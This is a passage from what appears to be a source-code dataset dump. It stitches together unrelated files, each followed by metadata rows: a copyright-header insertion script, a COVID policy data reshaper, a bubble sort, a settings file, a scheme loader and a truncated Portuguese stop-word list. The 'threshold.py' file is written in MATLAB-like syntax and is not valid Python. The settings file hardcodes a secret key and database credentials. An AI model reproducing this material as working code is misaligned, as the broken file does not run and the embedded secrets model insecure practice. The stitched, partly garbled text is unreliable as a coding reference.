self.domain_file_path = self.data_prefix + '/multi-woz-processed/domain_files.json'
self.slot_value_set_path = self.data_prefix + '/db/value_set_processed.json'
self.exp_domains = ['all'] # hotel,train, attraction, restaurant, taxi
self.enable_aspn = True
self.use_pvaspn = False
self.enable_bspn = True
self.bspn_mode = 'bspn' # 'bspn' or 'bsdx'
self.enable_dspn = False # removed
self.enable_dst = False
self.exp_domains = ['all'] # hotel,train, attraction, restaurant, taxi
self.max_context_length = 900
self.vocab_size = 3000
| 42.682927 | 91 | 0.645714 | 222 | 1,750 | 4.783784 | 0.283784 | 0.12806 | 0.19774 | 0.120527 | 0.292844 | 0.247646 | 0.169492 | 0.103578 | 0.103578 | 0.103578 | 0 | 0.005204 | 0.231429 | 1,750 | 40 | 92 | 43.75 | 0.784387 | 0.076571 | 0 | 0.0625 | 0 | 0 | 0.277191 | 0.229956 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.03125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
771d3fa0c3bd43d72d1bdf5d1c6f1888cb0021be | 15,025 | py | Python | CopyrightHeaderChecker.py | medazzo/CopyRitghHeaderChecker- | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | 2 | 2019-01-07T14:42:44.000Z | 2019-01-07T14:42:46.000Z | CopyrightHeaderChecker.py | medazzo/CopyRightHeaderChecker | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | null | null | null | CopyrightHeaderChecker.py | medazzo/CopyRightHeaderChecker | 320642ebd9216338820b6876519e9fae69252dd7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# @author Mohamed Azzouni , Paris, France
#
import os
import time
import ntpath
import sys
import json
import argparse
from os.path import join, getsize
from shutil import copyfile
behaviour = """{
"reporting": true ,
"updatefiles": true ,
"excludeDirs" :[".git",".repo"],
"shebang":
{
"she":["#!/","#!/bin","#!/usr/bin"],
"check": true
},
"oldCopyright":
{
"lookforandwarn": true,
"forceNewCopyright": false,
"numberofline":6
},
"checks":
[
{
"brief":"C/C++ Code",
"extensions":[".c",".cpp",".h",".hpp"],
"names":[],
"copyright":[
"/// @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$",
"/// ",
"/// @copyright $$CompanyYear$$ $$CompanyName$$",
"/// All rights exclusively reserved for $$CompanyName$$,",
"/// unless otherwise expressly agreed",
""]
},
{
"brief":"bash/scripting Code",
"extensions":[".conf",".conf.sample",".bb",".inc",".service",".sh",".cfg",".m4" ,".init",".py",".pl"],
"names":["init","run-ptest","llvm-config","build-env-set","init-build-env","setup-build-env","Dockerfile"],
"copyright":[
"# @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$",
"#",
"# @copyright $$CompanyYear$$ $$CompanyName$$",
"# All rights exclusively reserved for $$CompanyName$$,",
"# unless otherwise expressly agreed",
""]
},
{
"brief":"html/js Code",
"extensions":[".html"],
"names":[],
"copyright":[
"<!-- @author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$ -->",
"<!-- -->",
"<!-- @copyright $$CompanyYear$$ $$CompanyName$$ -->",
"<!-- All rights exclusively reserved for $$CompanyName$$ , -->",
"<!-- unless otherwise expressly agreed -->",
""]
},
{
"brief":"Markdown Code",
"extensions":[".md"],
"names":[],
"copyright":[
"[comment]: <> (@author your $$CompanyName$$ , $$CompanyAddress$$, $$CompanyCountry$$ )",
"[comment]: <> ( )",
"[comment]: <> (@copyright $$CompanyYear$$ $$CompanyName$$ )",
"[comment]: <> (All rights exclusively reserved for $$CompanyName$$, )",
"[comment]: <> (unless otherwise expressly agreed )",
""]
}
]
}"""
# Define
Debug = False
Outputfolder=""
Rbehaviour = json.loads(behaviour)
filesAlreadyCopyright = []
# Parameters :
# --dumpShebang : : dump the current list of managed shebang
# --dumpExtension : : dump the current list of managed files extensions
# -r --report [default: False]: if true print a complete report for what has done
# -u --update [default: False]: if true files will be updated else a modified copy will be generated
# -w --warnOldHeader [default: False]: if true do warn about Old Header existant in files in traces
# -f --forceOldHeader [default: False]: if true do replace old header if exist (exclusif with option warnOldHeader )
# -n --nameCompany : : string
# -a --adressCompany : : string
# -c --countryCompany : : string
# -y --yearCompany : : string
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Find all concerned Files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def SetupParserParameter( ):
""" this functions will setup parameter and parser for argument"""
parser = argparse.ArgumentParser(description='Checks sources code files for Copyright Header and add ours.',
prog='CopyrightHeaderChecker')
parser.add_argument('--version', action='version', version='%(prog)s 1.0')
parser.add_argument('--verbose', action='store_true', help='verbose mode ')
subparsers = parser.add_subparsers(help='sub command :')
parser_info = subparsers.add_parser('info', help='get checker informations ')
parser_info.add_argument('-s','--dumpShebang', dest='dumpShebang',action='store_true',
help='dump the current list of managed shebang')
parser_info.add_argument('-e', '--dumpExtension', dest='dumpExtension',action='store_true',
help='dump the current list of managed files extensions')
parser_process = subparsers.add_parser('process', help='process checker')
parser_process.add_argument('-r','--report', dest='report',action='store_true',
help='print a detailled report for what has done')
parser_process.add_argument('-u','--update', dest='update',action='store_true',
help='update files in sources path')
parser_process.add_argument('-w','--warnOldHeader', dest='warnOldHeader',action='store_false',
help='warn about Old Header existant in files in traces ')
parser_process.add_argument('-f','--forceOldHeader', dest='forceOldHeader',action='store_true',
help='replace old header if exist in files ')
parser_process.add_argument('-n','--nameCompany', dest='nameCompany',required=True,
help='company name to be used in copyright header')
parser_process.add_argument('-a','--adressCompany', dest='adressCompany',required=True,
help='company address to be used in copyright header')
parser_process.add_argument('-c','--countryCompany', dest='countryCompany',required=True,
help='company country to be used in copyright header')
parser_process.add_argument('-y','--yearCompany', dest='yearCompany',required=True,
help='years to be used in copyright header ')
parser_process.add_argument('-i','--inputSourecCodeFolder', dest='inputFolder',required=True,
help='path to folder containing source code to operate on')
args = parser.parse_args()
return args
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Find all concerned Files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def FindFiles(rootfolder, report ):
""" this functions will find files as defined up """
start = time.time()
for bhv in Rbehaviour["checks"]:
bhv["files"]=[]
for root, dirs,files in os.walk(rootfolder):
dirs[:] = [d for d in dirs if d not in Rbehaviour["excludeDirs"]]
for x in files :
sfileN = os.path.join(root, x)
if Debug : print(' ==> Checking file --> {}', format(sfileN))
# check old copyright
if Rbehaviour["oldCopyright"]["lookforandwarn"]:
if checkfileCopyright(sfileN):
filesAlreadyCopyright.append(sfileN)
if not Rbehaviour["oldCopyright"]["forceNewCopyright"]:
break
# checks
found = False
for bhv in Rbehaviour["checks"]:
# Check if file is in names
try:
bhv["names"].index(x)
except :
# Check if file is in extensions
if Debug :
print bhv["brief"]," extensions ==> Checking file --> ",
for x in bhv["extensions"]:
print x,
print " "
for ext in bhv["extensions"] :
if x.endswith(ext):
bhv["files"].append(sfileN)
if Debug :
print bhv["brief"]," >> ",ext," extensions ==> Found file --> ",x
found = True
break
else:
bhv["files"].append(sfileN)
found = True
if Debug : print ("{} names ==> Found file -->",format(bhv["brief"],x))
if found:
break
end = time.time()
took = end - start
if(report):
print " - - - - - - Analyse ",bhv['brief']," took %.4f sec - - - - - - "% took
for bhv in Rbehaviour["checks"]:
print " - - - - - - ",len(bhv["files"])," ",bhv["brief"]," files."
if (Rbehaviour["oldCopyright"]["lookforandwarn"]):
print " - - - - - - ! ",len(filesAlreadyCopyright)," files are already with a Copyright Headers :"
for x in filesAlreadyCopyright:
print " - ",x
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# for Sfiles check shebang
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def checkfileShebang(filename):
""" return true if file has a shebang """
if Rbehaviour["shebang"]["check"]:
if Debug : print(" Will check shebang .. " )
infile = open(filename, 'r')
firstLine = infile.readline()
infile.close()
for she in Rbehaviour["shebang"]["she"]:
if Debug : print("?? did file ",filename," start with ",she ," [",firstLine,"] " )
if firstLine.startswith(she):
return True
return False
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To check if file contain already a License Copyright Header
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def checkfileCopyright(filename):
""" return true if file has already a Copyright in first X lines """
infile = open(filename, 'r')
for x in xrange(6):
x = x
line = infile.readline()
if "Copyright" in line or "copyright" in line:
return True
return False
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Apply new Copyright to a file
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyCopyright( srcfile, dstfile , copyright, cname, ccontry, caddress, cyear):
""" will apply new Copyright on dst file then append the old src file """
# apply comany information
copyright = [w.replace('$$CompanyName$$', cname) for w in copyright]
copyright = [w.replace('$$CompanyCountry$$', ccontry) for w in copyright]
copyright = [w.replace('$$CompanyAddress$$', caddress) for w in copyright]
copyright = [w.replace('$$CompanyYear$$', cyear) for w in copyright]
if(srcfile != dstfile):
# create dir file if not exist
nbase = os.path.dirname(dstfile)
if not os.path.exists(nbase):
os.makedirs(nbase)
dst = open(dstfile, "w")
else:
tmp = "/tmp/tmp-fheadercopyrightLicense"
dst = open(tmp, "w")
isSheb = checkfileShebang(srcfile)
src = open(srcfile, "r")
if isSheb:
line = src.readline()
dst.write(line)
for cop in copyright:
dst.write(cop)
dst.write('\n')
# continue copy src file
while line:
line = src.readline()
dst.write(line)
else:
if Debug : print(" \t ==> file ",srcfile," DONT have shebang !" )
for cop in copyright:
dst.write(cop)
dst.write('\n')
dst.write(src.read())
dst.close()
src.close()
if(srcfile == dstfile):
copyfile(tmp, dstfile)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To apply new Copyright headers in files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyInTmp(OutDir,report, cname, ccontry, caddress, cyear):
""" will apply new Copyright on array of files into OutDir with Same tree as original """
global Outputfolder
# checks
for bhv in Rbehaviour["checks"]:
start = time.time()
for x in bhv["files"] :
# fix folder
p = os.path.dirname(x)
while p.startswith('../'):
p = p[3:]
if p.startswith('/'):
p = p[1:]
Outputfolder = OutDir+"/"+p
nfile = Outputfolder+"/"+ntpath.basename(x)
ApplyCopyright(x, nfile, bhv["copyright"], cname, ccontry, caddress, cyear)
end = time.time()
took = end - start
if(report):
print " - - - - - - Applying ",bhv['brief']," took %.4f sec - - - - - - "% took
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# To apply new Copyright headers in files
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
def ApplyIn(report, cname, ccontry, caddress, cyear):
""" will apply new Copyright on array of files into original Dir"""
# checks
for bhv in Rbehaviour["checks"]:
start = time.time()
for x in bhv["files"] :
ApplyCopyright(x, x, bhv["copyright"], cname, ccontry, caddress, cyear)
end = time.time()
took = end - start
if(report):
print" - - - - - - Applying ",bhv['brief']," took %.4f sec - - - - - - "% took
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # M A I N # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
print("- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -")
print("- - - - - - - - - - - - - - - - - - Copyright Header - - - - - - - - - - - - - - - - - - - - -")
args = SetupParserParameter()
Debug = args.verbose
if "dumpShebang" in args:
print("- - - - - - - Info - - - - - - ->")
if(args.dumpShebang == True):
print " Supportted shebang: ",
for x in Rbehaviour["shebang"]["she"]:
print x,
print " "
if(args.dumpExtension == True):
print " Supportted Extensions: "
for bhv in Rbehaviour["checks"]:
print " ",
print bhv["brief"]," : ",
for x in bhv["extensions"]:
print x,
print " "
else:
if not os.path.exists(args.inputFolder):
print(" - - - Bad parameter , source code path !! => ",args.inputFolder)
print(" - - - folder source did not exist ! - - - ")
exit(-2)
print("- - - - - - - Analyse - - - - - - ->")
FindFiles(args.inputFolder, args.report)
print("- - - - - - - Process - - - - - - ->")
if ( args.update == True):
ApplyIn(args.report,args.nameCompany, args.countryCompany, args.adressCompany, args.yearCompany)
else:
ApplyInTmp("/tmp", args.report, args.nameCompany, args.countryCompany, args.adressCompany, args.yearCompany)
print " Generated ", Outputfolder
print("<- - - - - - - Done - - - - - - - - - -")
print(" - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ")
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # D O N E # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
| 43.175287 | 122 | 0.493178 | 1,379 | 15,025 | 5.346628 | 0.22335 | 0.019395 | 0.019531 | 0.029296 | 0.350332 | 0.29825 | 0.267191 | 0.24861 | 0.222976 | 0.200461 | 0 | 0.001064 | 0.311681 | 15,025 | 347 | 123 | 43.299712 | 0.711855 | 0.136905 | 0 | 0.261993 | 0 | 0.01845 | 0.445954 | 0.036719 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.02952 | null | null | 0.125461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
772a4eead684d14c1321c64fcce204b67581646f | 4,217 | py | Python | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | null | null | null | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | 123 | 2020-10-12T11:06:27.000Z | 2021-04-28T15:32:29.000Z | src/manual/melt_oxcgrt2.py | lshtm-gis/WHO_PHSM_Cleaning | 5892673922fc555fb86d6e0be548b48c7dc66814 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 15:24:46 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
ox = ox[0:100]
#%%
ox.fillna(0.0, inplace = True)
#%%
def oxcgrt_records(ox, drop_columns = []):
'''
Function to convert OXCGRT data to records
This is an additional challenge because of the wide format of the Oxford data
'''
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
records = ox.to_dict(orient="records")
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
return(rs)
def get_names(ox):
'''
Function to get names of columns holding measure information.
These columns begin with the prefix "A1_" etc.
returns:
full_value_names: the names of all columns with measure information
value_names: the names of measure columns
stub_names: the measure column prefixes (i.e. "A1")
'''
stub_exp = r'[A-Z][0-9]+_'
full_value_names = [match for match in ox.columns if re.findall(stub_exp , match) != []]
value_names = [x for x in full_value_names if 'Flag' not in x]
value_names = [x for x in value_names if 'Notes' not in x]
stub_names = [x.split('_')[0] for x in value_names]
return(full_value_names, value_names, stub_names)
def get_measure_records(combined_record, stub_names, id_columns):
'''Function to break rows into individual records by stub group
i.e. subset a row for only C4 records and other information, repeat for all possible measures.
Also drops records with no data where sum(all values) == 0
'''
records = []
for stub in stub_names:
stub_keys = [x for x in full_value_names if stub in x]
keys = id_columns + stub_keys
try:
flag_key = [x for x in stub_keys if '_Flag' in x][0]
except:
pass
try:
notes_key = [x for x in stub_keys if '_Notes' in x][0]
except:
pass
subset = {key: value for key, value in combined_record.items() if key in keys}
try:
if sum([subset[key] for key in stub_keys]) == 0:
continue
except:
pass
try:
subset['flag'] = subset.pop(flag_key)
except:
subset['flag'] = 0.0
pass
try:
subset['notes'] = subset.pop(notes_key)
except:
pass
measure_key = list(set(list(subset.keys())).difference(set(id_columns + ['measure_name', 'flag', 'notes'])))
subset['measure'] = subset.pop(measure_key[0])
subset['measure_name'] = measure_key[0]
records.append(subset)
return(records)
#%%
drop_columns = ['ConfirmedCases',
'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_r = oxcgrt_records(ox, drop_columns)
#%%
len(ox_r)
#%%
keep_columns = list(set(ox.columns).difference(set(drop_columns)))
full_value_names, value_names, stub_names = get_names(ox)
id_columns = [x for x in list(set(ox.columns).difference(set(full_value_names))) if x not in drop_columns]
#%%
records = ox.to_dict(orient="records")
#%%
rs = [x for x in [get_measure_records(r, stub_names, id_columns) for r in records] if x != []]
rs = [item for sublist in rs for item in sublist]
rs = pd.DataFrame(rs)
#%%
| 27.562092 | 121 | 0.609912 | 558 | 4,217 | 4.448029 | 0.27957 | 0.068493 | 0.024174 | 0.025383 | 0.327558 | 0.268735 | 0.246172 | 0.232877 | 0.198227 | 0.198227 | 0 | 0.01092 | 0.283377 | 4,217 | 152 | 122 | 27.743421 | 0.81039 | 0.179749 | 0 | 0.367647 | 0 | 0.014706 | 0.145181 | 0.065361 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0.073529 | 0.044118 | 0 | 0.088235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
772cd907b931f0cbf42463265dfc425aa87bcb15 | 226 | py | Python | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 159 | 2017-10-02T22:03:14.000Z | 2022-03-10T23:02:22.000Z | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 9 | 2019-02-04T14:55:09.000Z | 2021-06-05T13:30:28.000Z | ds2/sorting/bubblesort.py | aslisabanci/datastructures | f7952801245bc8d386a03d92a38121f558bdacca | [
"MIT"
] | 49 | 2017-09-29T17:51:16.000Z | 2022-03-10T23:12:17.000Z | def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
| 25.111111 | 43 | 0.446903 | 34 | 226 | 2.970588 | 0.411765 | 0.118812 | 0.089109 | 0.118812 | 0.148515 | 0.118812 | 0.118812 | 0 | 0 | 0 | 0 | 0.029851 | 0.40708 | 226 | 8 | 44 | 28.25 | 0.723881 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
772d6d4f45275295dcb92a649c3abaa349cebcf6 | 431 | py | Python | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 1 | 2021-02-01T10:38:16.000Z | 2021-02-01T10:38:16.000Z | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 3 | 2021-02-02T11:06:16.000Z | 2021-02-06T11:44:19.000Z | src/features/threshold.py | HninPwint/nba-career-prediction | ffce32507cad2c4dd020c62cee7f33cf97c886f7 | [
"MIT"
] | 4 | 2021-01-31T10:57:23.000Z | 2021-02-02T06:16:35.000Z |
class threshold:
def threshold(num, threshold):
if ( threshold < 0 ) || ( threshold >= 1 )
error('threshold input must be in the range [0,1]');
end
fractional = num - floor( num );
idx1 = fractional > threshold;
idx2 = fractional <= threshold;
difference = 1 - fractional;
result = num + ( difference .* idx1 ) - ( fractional .* idx2 );
return(result)
end
| 26.9375 | 71 | 0.556845 | 44 | 431 | 5.454545 | 0.5 | 0.116667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.030928 | 0.324826 | 431 | 15 | 72 | 28.733333 | 0.793814 | 0 | 0 | 0.166667 | 0 | 0 | 0.097674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
77331bed5a7248d07a4fb3851abb1699ae7ce662 | 929 | py | Python | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 7 | 2020-07-28T06:53:02.000Z | 2022-03-18T05:23:03.000Z | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 1 | 2020-11-25T16:13:26.000Z | 2020-11-25T16:13:26.000Z | KristaBackup/common/schemes/__init__.py | javister/krista-backup | f8852c20afdf483e842ff22497bdd80eedc30c78 | [
"Apache-2.0"
] | 1 | 2020-07-28T13:47:09.000Z | 2020-07-28T13:47:09.000Z | from .scheme_factory import SchemeFactory
from .schemes import schemes
_default_scheme_id = 'default'
def get_scheme(scheme_id=None):
"""Возвращает схему по scheme_id.
Args:
scheme_id: Строка, уникальное имя схемы.
Returns:
Scheme или None, если схемы с scheme_id не существует.
"""
global _default_scheme_id
if not scheme_id:
scheme_id = _default_scheme_id
scheme = schemes.get(scheme_id, None)
if scheme:
return scheme()
return None
def update_scheme(name, new_scheme):
schemes[name] = new_scheme
def set_default(scheme_id):
global _default_scheme_id
_default_scheme_id = scheme_id
def get_scheme_by_config(scheme_config):
"""Возвращает схему по конфигурации.
Returns:
Сформированную схему
Raises:
Если схема с текущим scheme_id уже существует.
"""
return SchemeFactory.from_dict(scheme_config)
| 19.765957 | 62 | 0.70183 | 120 | 929 | 5.125 | 0.35 | 0.195122 | 0.146341 | 0.071545 | 0.094309 | 0.094309 | 0 | 0 | 0 | 0 | 0 | 0 | 0.233585 | 929 | 46 | 63 | 20.195652 | 0.863764 | 0.301399 | 0 | 0.111111 | 0 | 0 | 0.011785 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7738b7fae9ef9456645f45d2e182dbc304825ba1 | 1,573 | py | Python | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 42 | 2015-03-04T09:05:00.000Z | 2018-12-01T15:13:48.000Z | src/hydro/conf/settings_base.py | aolarchive/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 5 | 2015-05-11T08:18:12.000Z | 2016-03-22T19:11:01.000Z | src/hydro/conf/settings_base.py | Convertro/Hydro | 8580aebc30694156c436e5ba7470d3fcbb46896b | [
"MIT"
] | 4 | 2015-03-05T09:07:27.000Z | 2018-12-01T15:13:49.000Z | # Hydro settings
TIME_ZONE = 'UTC'
LANGUAGE_CODE = 'en-us'
APPLICATION_NAME = 'HYDRO'
SECRET_KEY = '8lu*6g0lg)9w!ba+a$edk)xx)x%rxgb$i1&022shmi1jcgihb*'
# SESSION_TIMEOUT is used in validate_session_active decorator to see if the
# session is active.
SECOND = 1
MINUTE = SECOND * 60
SECONDS_IN_DAY = SECOND*86400
MYSQL_CACHE_DB = 'cache'
MYSQL_STATS_DB = 'stats'
MYSQL_CACHE_TABLE = 'hydro_cache_table'
CACHE_IN_MEMORY_KEY_EXPIRE = 600
CACHE_DB_KEY_EXPIRE = 86400
USE_STATS_DB = False
DATABASES = {
'stats': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_STATS_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'cache': {
'ENGINE': 'django.db.backends.mysql',
'NAME': MYSQL_CACHE_DB,
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
},
},
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'cache',
'USER': 'root',
'PASSWORD': 'xxxx',
'HOST': '127.0.0.1',
'OPTIONS': {
"init_command": "SET storage_engine=INNODB; SET SESSION TRANSACTION ISOLATION LEVEL READ COMMITTED;",
"compress": True
}
},
}
| 26.661017 | 113 | 0.591863 | 185 | 1,573 | 4.837838 | 0.427027 | 0.03352 | 0.046927 | 0.073743 | 0.555307 | 0.555307 | 0.52067 | 0.440223 | 0.440223 | 0.440223 | 0 | 0.037229 | 0.265734 | 1,573 | 58 | 114 | 27.12069 | 0.737662 | 0.068659 | 0 | 0.4375 | 0 | 0.020833 | 0.440794 | 0.131417 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
774b06809a445d82f24ad6693ec8a85d76b2e232 | 2,554 | py | Python | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 12 | 2019-03-20T20:43:47.000Z | 2020-04-13T11:10:52.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 13 | 2018-06-05T11:54:40.000Z | 2019-07-02T11:33:14.000Z | spacy/lang/pt/stop_words.py | cedar101/spaCy | 66e22098a8bb77cbe527b1a4a3c69ec1cfb56f95 | [
"MIT"
] | 2 | 2020-02-15T18:33:35.000Z | 2022-02-13T14:11:41.000Z | # coding: utf8
from __future__ import unicode_literals
STOP_WORDS = set(
"""
à às área acerca ademais adeus agora ainda algo algumas alguns ali além ambas ambos antes
ao aos apenas apoia apoio apontar após aquela aquelas aquele aqueles aqui aquilo
as assim através atrás até aí
baixo bastante bem boa bom breve
cada caminho catorze cedo cento certamente certeza cima cinco coisa com como
comprida comprido conhecida conhecido conselho contra contudo corrente cuja
cujo custa cá
da daquela daquele dar das de debaixo demais dentro depois des desde dessa desse
desta deste deve devem deverá dez dezanove dezasseis dezassete dezoito diante
direita disso diz dizem dizer do dois dos doze duas dá dão
é és ela elas ele eles em embora enquanto entre então era essa essas esse esses esta
estado estar estará estas estava este estes esteve estive estivemos estiveram
estiveste estivestes estou está estás estão eu eventual exemplo
falta fará favor faz fazeis fazem fazemos fazer fazes fazia faço fez fim final
foi fomos for fora foram forma foste fostes fui
geral grande grandes grupo
inclusive iniciar inicio ir irá isso isto
já
lado lhe ligado local logo longe lugar lá
maior maioria maiorias mais mal mas me meio menor menos meses mesmo meu meus mil
minha minhas momento muito muitos máximo mês
na nada naquela naquele nas nem nenhuma nessa nesse nesta neste no nos nossa
nossas nosso nossos nova novas nove novo novos num numa nunca nuns não nível nós
número números
obrigada obrigado oitava oitavo oito onde ontem onze ora os ou outra outras outros
para parece parte partir pegar pela pelas pelo pelos perto pode podem poder poderá
podia pois ponto pontos por porquanto porque porquê portanto porém posição
possivelmente posso possível pouca pouco povo primeira primeiro próprio próxima
próximo puderam pôde põe põem
quais qual qualquer quando quanto quarta quarto quatro que quem quer querem quero
questão quieta quieto quinta quinto quinze quê
relação
sabe saber se segunda segundo sei seis sem sempre ser seria sete seu seus sexta
